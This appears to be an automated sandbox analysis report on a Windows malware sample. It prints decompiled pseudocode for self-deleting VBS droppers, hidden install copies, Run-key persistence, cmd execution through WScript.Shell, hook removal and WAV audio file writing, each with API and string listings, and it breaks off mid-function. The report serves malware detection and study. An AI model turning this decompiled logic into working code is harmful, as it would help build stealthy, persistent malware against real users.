                      				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
                      				asm("sbb bl, bl");
                      				E007430A6(_t123,  &_v148, E007572DA( &_v76, E00757093( &_v28)), 0, _t233, L".vbs");
                      				E00741EF0();
                      				E00741FC7();
                      				E00744429(_t123,  &_v124, E007430A6(_t123,  &_v28, E0074427F(_t123,  &_v76, E0077987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
                      				E00741EF0();
                      				E00741EF0();
                      				E00744405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0074427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
                      				E00741EF0();
                      				_t124 = _t123 & 0x00000001;
                      				_t234 = _t124;
                      				if(_t124 != 0) {
                      					E00743311(E007430A6(_t124,  &_v28, E00744405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0074427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
                      					E00741EF0();
                      					E00741EF0();
                      					E00741EF0();
                      				}
                      				E00743311(E007430A6(_t124,  &_v100, E007430A6(_t124,  &_v28, E0074427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
                      				E00741EF0();
                      				E00741EF0();
                      				E00741EF0();
                      				_t235 = _t124;
                      				if(_t124 != 0) {
                      					E0074766C(_t124,  &_v52, 0, L"wend\n");
                      				}
                      				_t82 = E007474E4(_t235);
                      				_t236 = _t82;
                      				if(_t82 != 0) {
                      					E00743311(E007430A6(0x79f724,  &_v100, E00749E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x7ac530), 0, _t236, L"\"\n"));
                      					E00741EF0();
                      					E00741EF0();
                      				}
                      				E0074766C(0x79f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
                      				_t84 = E00741EEB( &_v124);
                      				_t85 = E00742489();
                      				if(E00757947(E00741EEB( &_v52), _t85 + _t85, _t84, 0) != 0) {
                      					ShellExecuteW(0, L"open", E00741EEB( &_v124), 0x79f724, 0x79f724, 0);
                      				}
                      				ExitProcess(0);
                      			}


                      APIs
                        • Part of subcall function 0075015B: TerminateProcess.KERNEL32(00000000,?,0074AD95), ref: 0075016B
                        • Part of subcall function 0075015B: WaitForSingleObject.KERNEL32(000000FF,?,0074AD95), ref: 0075017E
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0074AE8E
                      • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0074AEA1
                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0074AECF
                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 0074AEDD
                        • Part of subcall function 00749D73: TerminateThread.KERNEL32(0074884B,00000000,?,0074ADA3), ref: 00749D82
                        • Part of subcall function 00749D73: UnhookWindowsHookEx.USER32(00000000), ref: 00749D92
                        • Part of subcall function 00749D73: TerminateThread.KERNEL32(Function_00008830,00000000,?,0074ADA3), ref: 00749DA4
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074B0D4
                      • ExitProcess.KERNEL32 ref: 0074B0DB
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
• Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                      • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                      • API String ID: 3659626935-2802769051
                      • Opcode ID: 23cc23ff93a28e579b13016005fe02366f3bcaa9dc1fc2bf0c2167235a330f17
                      • Instruction ID: 074a55d010557312c3cd0ca52db579b7c8c690ac6c165dbffb8c1772a05e074a
                      • Opcode Fuzzy Hash: 23cc23ff93a28e579b13016005fe02366f3bcaa9dc1fc2bf0c2167235a330f17
                      • Instruction Fuzzy Hash: 1181A571A10118ABCB19F7A0DC6ADFF777AAF91700F404129F806671A2EF2C5D8AC690
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00741A64(WCHAR* __ecx, signed int __edx) {
                      				long _v8;
                      				void _v12;
                      				void _v16;
                      				void _v20;
                      				void _v24;
                      				void _v28;
                      				void _v32;
                      				signed int _t36;
                      				void** _t75;
                      				signed int _t80;
                      				void* _t81;
                      				signed int _t83;
                      
                      				_t75 = __edx;
                      				_t80 =  *0x7aba9a & 0x0000ffff;
                      				_t83 = ( *0x7abaa6 & 0x0000ffff) * _t80;
                      				_v20 = 1;
                      				_v16 = 0x10;
                      				_v24 = _t83 *  *0x7aba9c >> 3;
                      				asm("cdq");
                      				_v28 = _t83 + (__edx & 0x00000007) >> 3;
                      				_t36 =  *(__edx + 4) * _t80;
                      				_v32 = _t36;
                      				_v12 = _t36 + 0x24;
                      				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                      				if(_t81 != 0xffffffff) {
                      					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
                      					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
                      					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
                      					WriteFile(_t81, 0x7aba9a, 2,  &_v8, 0);
                      					WriteFile(_t81, 0x7aba9c, 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
                      					WriteFile(_t81, 0x7abaa6, 2,  &_v8, 0);
                      					WriteFile(_t81, "data", 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
                      					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
                      					CloseHandle(_t81);
                      					return 1;
                      				}
                      				return 0;
                      			}


                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741ACC
                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741AF3
                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B02
                      • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B12
                      • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B22
                      • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B31
                      • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B40
                      • WriteFile.KERNEL32(00000000,007ABA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B50
                      • WriteFile.KERNEL32(00000000,007ABA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B60
                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B6F
                      • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B7E
                      • WriteFile.KERNEL32(00000000,007ABAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B8E
                      • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741B9E
                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741BAD
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Write$Create
                      • String ID: RIFF$WAVE$data$fmt
                      • API String ID: 1602526932-4212202414
                      • Opcode ID: b6b224c4a9847c6b8756e5e5cd1214a6661ab53e66020115fc4c0c88b039bbc3
                      • Instruction ID: 1be4641a6e65af043514cfeff5e5ebb85f5d20be820419a2af10d2ad7aed0515
                      • Opcode Fuzzy Hash: b6b224c4a9847c6b8756e5e5cd1214a6661ab53e66020115fc4c0c88b039bbc3
                      • Instruction Fuzzy Hash: 69410CB5A40218BAE710DB91CD86FFFBABCEB45B50F404056F704EA0C1D7B85A05DBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0074A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
                      				char _v9;
                      				int _v20;
                      				char _v44;
                      				char _v68;
                      				char _v92;
                      				char _v116;
                      				char _v140;
                      				char _v164;
                      				char _v188;
                      				char _v212;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr _t62;
                      				void* _t63;
                      				signed int _t67;
                      				signed int _t68;
                      				int _t70;
                      				void* _t79;
                      				void* _t91;
                      				void* _t92;
                      				int _t94;
                      				void* _t99;
                      				void* _t100;
                      				WCHAR* _t113;
                      				int _t115;
                      				intOrPtr _t118;
                      				WCHAR* _t123;
                      				int _t124;
                      				void* _t139;
                      				intOrPtr* _t152;
                      				int _t153;
                      				intOrPtr* _t207;
                      				int _t208;
                      				intOrPtr* _t235;
                      				void* _t236;
                      				void* _t239;
                      				void* _t249;
                      				void* _t250;
                      				intOrPtr _t254;
                      				void* _t257;
                      				void* _t259;
                      				intOrPtr* _t260;
                      
                      				_t235 = __edx;
                      				_v9 = __ecx;
                      				_t260 = __edx;
                      				_v20 = 0;
                      				_t257 = __edx + 2;
                      				do {
                      					_t62 =  *_t235;
                      					_t235 = _t235 + 2;
                      				} while (_t62 != 0);
                      				_t236 = _t235 - _t257;
                      				_t268 = _t236;
                      				if(_t236 == 0) {
                      					_t143 = _a4;
                      					_t238 = __ecx;
                      					_t63 = E0075805B( &_v92, __ecx, _t143);
                      					_t259 = 0x7ac500;
                      					E00741EFA(0x7ac500, _t238, _t260, _t63);
                      				} else {
                      					CreateDirectoryW(E00741EEB(0x7ac530), 0);
                      					_t143 = _a4;
                      					_t139 = E007430A6(_t143,  &_v92, E00747514( &_v44, 0x7ac530, _t268, "\\"), 0x7ac530, _t268, _t143);
                      					_t259 = 0x7ac500;
                      					E00741EFA(0x7ac500, _t138, _t260, _t139);
                      					E00741EF0();
                      				}
                      				E00741EF0();
                      				_t152 = E00741EEB(_t259);
                      				_t67 = 0x7abb08;
                      				while(1) {
                      					_t239 =  *_t67;
                      					if(_t239 !=  *_t152) {
                      						break;
                      					}
                      					if(_t239 == 0) {
                      						L10:
                      						_t153 = 0;
                      						_t68 = 0;
                      						L12:
                      						if(_t68 != 0) {
                      							_t70 = CopyFileW(0x7abb08, E00741EEB(_t259), _t153);
                      							__eflags = _t70;
                      							if(_t70 != 0) {
                      								L23:
                      								E0074A896(0x7ac4e8, E00741EEB(0x7ac4e8));
                      								__eflags = _a8 - 1;
                      								_pop(_t157);
                      								if(__eflags != 0) {
                      									L28:
                      									E007430A6(_t143,  &_v92, E0074427F(_t143,  &_v68, E0077987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
                      									E00741EF0();
                      									E0074427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
                      									E0074766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                      									__eflags = _a12 - 1;
                      									_t144 = "\n";
                      									if(__eflags == 0) {
                      										_t100 = E0074427F("\n",  &_v212, 0x7abb08);
                      										E00743311(E007430A6(_t144,  &_v68, E007430A6(_t144,  &_v116, E00743030( &_v140, E007430A6(_t144,  &_v164, E0074427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
                      										E00741EF0();
                      										E00741EF0();
                      										E00741EF0();
                      										E00741EF0();
                      										E00741EF0();
                      										E00741EF0();
                      									}
                      									_t79 = E0074427F(_t144,  &_v116, L"\"\"\", 0");
                      									E00743311(E007430A6(_t144,  &_v212, E00743030( &_v188, E00744429(_t144,  &_v164, E0074427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E00741EF0();
                      									E0074766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
                      									_t91 = E00741EEB( &_v92);
                      									_t92 = E00742489();
                      									_t94 = E00757947(E00741EEB( &_v44), _t92 + _t92, _t91, 0);
                      									__eflags = _t94;
                      									if(_t94 == 0) {
                      										L33:
                      										E00741EF0();
                      										return E00741EF0();
                      									} else {
                      										_t99 = ShellExecuteW(0, L"open", E00741EEB( &_v92), 0x79f724, 0x79f724, 0);
                      										__eflags = _t99 - 0x20;
                      										if(_t99 <= 0x20) {
                      											goto L33;
                      										}
                      										ExitProcess(0);
                      									}
                      								}
                      								_t113 = E00741EEB(_t259);
                      								_t143 = SetFileAttributesW;
                      								SetFileAttributesW(_t113, 7);
                      								_t249 = _t260 + 2;
                      								_t157 = 0;
                      								__eflags = 0;
                      								do {
                      									_t115 =  *_t260;
                      									_t260 = _t260 + 2;
                      									__eflags = _t115;
                      								} while (_t115 != 0);
                      								__eflags = _t260 - _t249;
                      								if(__eflags != 0) {
                      									_t157 = 0x7ac530;
                      									SetFileAttributesW(E00741EEB(0x7ac530), 7);
                      								}
                      								goto L28;
                      							}
                      							__eflags = _v9 - 0x36;
                      							if(_v9 == 0x36) {
                      								goto L23;
                      							}
                      							_t207 = _t260;
                      							_t250 = _t207 + 2;
                      							do {
                      								_t118 =  *_t207;
                      								_t207 = _t207 + 2;
                      								__eflags = _t118 - _v20;
                      							} while (_t118 != _v20);
                      							_t208 = _t207 - _t250;
                      							__eflags = _t208;
                      							_push(_t143);
                      							if(_t208 == 0) {
                      								E00741EFA(_t259, 0x36, _t260, E0075805B( &_v68, 0x36));
                      							} else {
                      								E00741EFA(_t259, _t128, _t260, E007430A6(_t143,  &_v140, E007430A6(_t143,  &_v116, E0075805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
                      								E00741EF0();
                      								E00741EF0();
                      							}
                      							E00741EF0();
                      							_t123 = E00741EEB(_t259);
                      							_t143 = 0x7abb08;
                      							_t124 = CopyFileW(0x7abb08, _t123, 0);
                      							__eflags = _t124;
                      							if(_t124 != 0) {
                      								goto L23;
                      							} else {
                      								E00749DC9(0x7abb08, _t259, 0x7abb08);
                      								return 0;
                      							}
                      						}
                      						E0074A896(0x7ac4e8, E00741EEB(0x7ac4e8));
                      						return 1;
                      					}
                      					_t12 = _t67 + 2; // 0x0
                      					_t254 =  *_t12;
                      					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
                      						break;
                      					}
                      					_t67 = _t67 + 4;
                      					_t152 = _t152 + 4;
                      					if(_t254 != 0) {
                      						continue;
                      					}
                      					goto L10;
                      				}
                      				asm("sbb eax, eax");
                      				_t68 = _t67 | 0x00000001;
                      				_t153 = 0;
                      				__eflags = 0;
                      				goto L12;
                      			}
                      0x0074a987
                      0x0074a994
                      0x0074a998
                      0x0074a99a
                      0x0074a99d
                      0x0074a9a0
                      0x0074a9a0
                      0x0074a9a3
                      0x0074a9a6
                      0x0074a9ab
                      0x0074a9ab
                      0x0074a9b4
                      0x0074a9fe
                      0x0074aa01
                      0x0074aa07
                      0x0074aa0d
                      0x0074aa15
                      0x0074a9b6
                      0x0074a9bf
                      0x0074a9c5
                      0x0074a9de
                      0x0074a9e4
                      0x0074a9ec
                      0x0074a9f4
                      0x0074a9f9
                      0x0074aa1d
                      0x0074aa29
                      0x0074aa2b
                      0x0074aa30
                      0x0074aa30
                      0x0074aa36
                      0x00000000
                      0x00000000
                      0x0074aa3b
                      0x0074aa52
                      0x0074aa52
                      0x0074aa54
                      0x0074aa5f
                      0x0074aa61
                      0x0074aa8b
                      0x0074aa91
                      0x0074aa93
                      0x0074ab42
                      0x0074ab4e
                      0x0074ab53
                      0x0074ab58
                      0x0074ab59
                      0x0074ab92
                      0x0074abb0
                      0x0074abb9
                      0x0074abc6
                      0x0074abd3
                      0x0074abd8
                      0x0074abdc
                      0x0074abe1
                      0x0074abf9
                      0x0074ac46
                      0x0074ac4e
                      0x0074ac56
                      0x0074ac61
                      0x0074ac6c
                      0x0074ac77
                      0x0074ac82
                      0x0074ac82
                      0x0074ac90
                      0x0074acd2
                      0x0074acdd
                      0x0074ace8
                      0x0074acf3
                      0x0074acfb
                      0x0074ad03
                      0x0074ad10
                      0x0074ad1b
                      0x0074ad24
                      0x0074ad39
                      0x0074ad40
                      0x0074ad42
                      0x0074ad6d
                      0x0074ad70
                      0x00000000
                      0x0074ad44
                      0x0074ad5b
                      0x0074ad61
                      0x0074ad64
                      0x00000000
                      0x00000000
                      0x0074ad67
                      0x0074ad67
                      0x0074ad42
                      0x0074ab5f
                      0x0074ab64
                      0x0074ab6b
                      0x0074ab6d
                      0x0074ab70
                      0x0074ab70
                      0x0074ab72
                      0x0074ab72
                      0x0074ab75
                      0x0074ab78
                      0x0074ab78
                      0x0074ab7d
                      0x0074ab81
                      0x0074ab85
                      0x0074ab90
                      0x0074ab90
                      0x00000000
                      0x0074ab81
                      0x0074aa99
                      0x0074aa9d
                      0x00000000
                      0x00000000
                      0x0074aaa3
                      0x0074aaa5
                      0x0074aaa8
                      0x0074aaa8
                      0x0074aaab
                      0x0074aaae
                      0x0074aaae
                      0x0074aab4
                      0x0074aab4
                      0x0074aaba
                      0x0074aabe
                      0x0074ab0b
                      0x0074aac0
                      0x0074aae8
                      0x0074aaf3
                      0x0074aafb
                      0x0074aafb
                      0x0074ab13
                      0x0074ab1d
                      0x0074ab23
                      0x0074ab29
                      0x0074ab2f
                      0x0074ab31
                      0x00000000
                      0x0074ab33
                      0x0074ab36
                      0x00000000
                      0x0074ab3b
                      0x0074ab31
                      0x0074aa6f
                      0x00000000
                      0x0074aa76
                      0x0074aa3d
                      0x0074aa3d
                      0x0074aa45
                      0x00000000
                      0x00000000
                      0x0074aa47
                      0x0074aa4a
                      0x0074aa50
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0074aa50
                      0x0074aa58
                      0x0074aa5a
                      0x0074aa5d
                      0x0074aa5d
                      0x00000000

                      APIs
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0074A9BF
                      • CopyFileW.KERNEL32(007ABB08,00000000,00000000,00000000), ref: 0074AA8B
                      • CopyFileW.KERNEL32(007ABB08,00000000,00000000,00000000), ref: 0074AB29
                        • Part of subcall function 0075805B: GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 007581B2
                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0074AB6B
                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0074AB90
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0079F724,0079F724,00000000), ref: 0074AD5B
                      • ExitProcess.KERNEL32 ref: 0074AD67
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
                      • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                      • API String ID: 4018752923-1662879639
                      • Opcode ID: 2fb50810ee5dc7b4033e5524a698ca6851b4955926640bf861d52df39408eb67
                      • Instruction ID: 0f1f32120cac7f3dcf4d8db4977b8d721fabf051f04d835e970f2a4bdcc89b7e
                      • Opcode Fuzzy Hash: 2fb50810ee5dc7b4033e5524a698ca6851b4955926640bf861d52df39408eb67
                      • Instruction Fuzzy Hash: 1DA1A975A00114E7CB28F7A4DC56EFE737AAF64301F904129F80AA7191EF3C6E86C665
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E007876AD(signed int _a4, signed int _a8) {
                      				signed int _v0;
                      				signed char _v5;
                      				intOrPtr _v8;
                      				signed char _v9;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				signed int _v44;
                      				signed int _v92;
                      				signed int _v128;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t116;
                      				signed int _t119;
                      				signed int _t120;
                      				signed int _t122;
                      				signed int _t123;
                      				signed int _t126;
                      				signed int _t127;
                      				signed int _t131;
                      				signed int _t133;
                      				signed int _t136;
                      				signed int _t138;
                      				signed int _t139;
                      				signed int _t142;
                      				void* _t143;
                      				signed int _t148;
                      				signed int* _t150;
                      				signed int* _t156;
                      				signed int _t163;
                      				signed int _t165;
                      				signed int _t167;
                      				intOrPtr _t168;
                      				signed int _t173;
                      				signed int _t175;
                      				signed int _t176;
                      				signed int _t180;
                      				signed int _t185;
                      				intOrPtr* _t186;
                      				signed int _t191;
                      				signed int _t196;
                      				signed int _t197;
                      				signed int _t204;
                      				intOrPtr* _t205;
                      				signed int _t214;
                      				signed int _t215;
                      				signed int _t217;
                      				signed int _t218;
                      				signed int _t220;
                      				signed int _t221;
                      				signed int _t223;
                      				intOrPtr _t225;
                      				void* _t231;
                      				signed int _t233;
                      				void* _t236;
                      				signed int _t237;
                      				signed int _t238;
                      				void* _t241;
                      				signed int _t244;
                      				signed int _t246;
                      				void* _t252;
                      				signed int _t253;
                      				signed int _t254;
                      				void* _t260;
                      				void* _t262;
                      				signed int _t263;
                      				intOrPtr* _t267;
                      				intOrPtr* _t271;
                      				signed int _t274;
                      				signed int _t276;
                      				signed int _t280;
                      				signed int _t282;
                      				void* _t283;
                      				void* _t284;
                      				void* _t285;
                      				signed int _t286;
                      				signed int _t288;
                      				signed int _t290;
                      				signed int _t291;
                      				signed int* _t292;
                      				signed int _t298;
                      				signed int _t299;
                      				CHAR* _t300;
                      				signed int _t302;
                      				signed int _t303;
                      				WCHAR* _t304;
                      				signed int _t305;
                      				signed int _t306;
                      				signed int* _t307;
                      				signed int _t308;
                      				signed int _t310;
                      				void* _t316;
                      				void* _t317;
                      				void* _t318;
                      				void* _t320;
                      				void* _t321;
                      				void* _t322;
                      				void* _t323;
                      
                      				_t217 = _a4;
                      				if(_t217 != 0) {
                      					_t286 = _t217;
                      					_t116 = E00774F60(_t217, 0x3d);
                      					_v16 = _t116;
                      					_t231 = _t285;
                      					__eflags = _t116;
                      					if(_t116 == 0) {
                      						L10:
                      						 *((intOrPtr*)(E0077A504())) = 0x16;
                      						goto L11;
                      					} else {
                      						__eflags = _t116 - _t217;
                      						if(_t116 == _t217) {
                      							goto L10;
                      						} else {
                      							__eflags =  *((char*)(_t116 + 1));
                      							_t298 =  *0x7ab4d0; // 0x2d19f60
                      							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                      							_v5 = _t120;
                      							__eflags = _t298 -  *0x7ab4dc; // 0x2d19f60
                      							if(__eflags == 0) {
                      								L87();
                      								_t298 = _t120;
                      								_t120 = _v5;
                      								_t231 = _t298;
                      								 *0x7ab4d0 = _t298;
                      							}
                      							_t218 = 0;
                      							__eflags = _t298;
                      							if(_t298 != 0) {
                      								L21:
                      								_t233 = _t286;
                      								_t122 = _v16 - _t233;
                      								_push(_t122);
                      								_push(_t233);
                      								L121();
                      								_v12 = _t122;
                      								__eflags = _t122;
                      								if(_t122 < 0) {
                      									L29:
                      									__eflags = _v5 - _t218;
                      									if(_v5 != _t218) {
                      										goto L12;
                      									} else {
                      										_t123 =  ~_t122;
                      										_v12 = _t123;
                      										_t27 = _t123 + 2; // 0x2
                      										_t236 = _t27;
                      										__eflags = _t236 - _t123;
                      										if(_t236 < _t123) {
                      											goto L11;
                      										} else {
                      											__eflags = _t236 - 0x3fffffff;
                      											if(_t236 >= 0x3fffffff) {
                      												goto L11;
                      											} else {
                      												_push(4);
                      												_push(_t236);
                      												_t299 = E00787D55(_t298);
                      												E007801F5(_t218);
                      												_t320 = _t320 + 0x10;
                      												__eflags = _t299;
                      												if(_t299 == 0) {
                      													goto L11;
                      												} else {
                      													_t237 = _v12;
                      													_t286 = _t218;
                      													_t126 = _a4;
                      													 *(_t299 + _t237 * 4) = _t126;
                      													 *(_t299 + 4 + _t237 * 4) = _t218;
                      													goto L34;
                      												}
                      											}
                      										}
                      									}
                      								} else {
                      									__eflags =  *_t298 - _t218;
                      									if( *_t298 == _t218) {
                      										goto L29;
                      									} else {
                      										E007801F5( *((intOrPtr*)(_t298 + _t122 * 4)));
                      										_t282 = _v12;
                      										__eflags = _v5 - _t218;
                      										if(_v5 != _t218) {
                      											while(1) {
                      												__eflags =  *(_t298 + _t282 * 4) - _t218;
                      												if( *(_t298 + _t282 * 4) == _t218) {
                      													break;
                      												}
                      												_t19 = _t282 * 4; // 0x2d1f1c0
                      												 *(_t298 + _t282 * 4) =  *(_t298 + _t19 + 4);
                      												_t282 = _t282 + 1;
                      												__eflags = _t282;
                      											}
                      											_push(4);
                      											_push(_t282);
                      											_t299 = E00787D55(_t298);
                      											E007801F5(_t218);
                      											_t320 = _t320 + 0x10;
                      											_t126 = _t286;
                      											__eflags = _t299;
                      											if(_t299 != 0) {
                      												L34:
                      												 *0x7ab4d0 = _t299;
                      											}
                      										} else {
                      											_t126 = _a4;
                      											_t286 = _t218;
                      											 *(_t298 + _t282 * 4) = _t126;
                      										}
                      										__eflags = _a8 - _t218;
                      										if(_a8 == _t218) {
                      											goto L12;
                      										} else {
                      											_t238 = _t126;
                      											_t283 = _t238 + 1;
                      											do {
                      												_t127 =  *_t238;
                      												_t238 = _t238 + 1;
                      												__eflags = _t127;
                      											} while (_t127 != 0);
                      											_v12 = _t238 - _t283 + 2;
                      											_t300 = E0077F348(_t238 - _t283, _t238 - _t283 + 2, 1);
                      											_pop(_t241);
                      											__eflags = _t300;
                      											if(_t300 == 0) {
                      												L42:
                      												E007801F5(_t300);
                      												goto L12;
                      											} else {
                      												_t131 = E00781916(_t300, _v12, _a4);
                      												_t321 = _t320 + 0xc;
                      												__eflags = _t131;
                      												if(_t131 != 0) {
                      													_push(_t218);
                      													_push(_t218);
                      													_push(_t218);
                      													_push(_t218);
                      													_push(_t218);
                      													E0077698A();
                      													asm("int3");
                      													_t316 = _t321;
                      													_t322 = _t321 - 0xc;
                      													_push(_t218);
                      													_t220 = _v44;
                      													__eflags = _t220;
                      													if(_t220 != 0) {
                      														_push(_t300);
                      														_push(_t286);
                      														_push(0x3d);
                      														_t288 = _t220;
                      														_t133 = E00790FF7(_t241);
                      														_v20 = _t133;
                      														_t244 = _t220;
                      														__eflags = _t133;
                      														if(_t133 == 0) {
                      															L54:
                      															 *((intOrPtr*)(E0077A504())) = 0x16;
                      															goto L55;
                      														} else {
                      															__eflags = _t133 - _t220;
                      															if(_t133 == _t220) {
                      																goto L54;
                      															} else {
                      																_t302 =  *0x7ab4d4; // 0x0
                      																_t221 = 0;
                      																__eflags =  *(_t133 + 2);
                      																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                      																_v9 = _t246;
                      																__eflags = _t302 -  *0x7ab4d8; // 0x0
                      																if(__eflags == 0) {
                      																	_push(_t302);
                      																	L104();
                      																	_t246 = _v9;
                      																	_t302 = _t133;
                      																	 *0x7ab4d4 = _t302;
                      																}
                      																__eflags = _t302;
                      																if(_t302 != 0) {
                      																	L64:
                      																	_v20 = _v20 - _t288 >> 1;
                      																	_t138 = E00787CE8(_t288, _v20 - _t288 >> 1);
                      																	_v16 = _t138;
                      																	__eflags = _t138;
                      																	if(_t138 < 0) {
                      																		L72:
                      																		__eflags = _v9 - _t221;
                      																		if(_v9 != _t221) {
                      																			goto L56;
                      																		} else {
                      																			_t139 =  ~_t138;
                      																			_v16 = _t139;
                      																			_t72 = _t139 + 2; // 0x2
                      																			_t252 = _t72;
                      																			__eflags = _t252 - _t139;
                      																			if(_t252 < _t139) {
                      																				goto L55;
                      																			} else {
                      																				__eflags = _t252 - 0x3fffffff;
                      																				if(_t252 >= 0x3fffffff) {
                      																					goto L55;
                      																				} else {
                      																					_push(4);
                      																					_push(_t252);
                      																					_t303 = E00787D55(_t302);
                      																					E007801F5(_t221);
                      																					_t322 = _t322 + 0x10;
                      																					__eflags = _t303;
                      																					if(_t303 == 0) {
                      																						goto L55;
                      																					} else {
                      																						_t253 = _v16;
                      																						_t288 = _t221;
                      																						_t142 = _v0;
                      																						 *(_t303 + _t253 * 4) = _t142;
                      																						 *(_t303 + 4 + _t253 * 4) = _t221;
                      																						goto L77;
                      																					}
                      																				}
                      																			}
                      																		}
                      																	} else {
                      																		__eflags =  *_t302 - _t221;
                      																		if( *_t302 == _t221) {
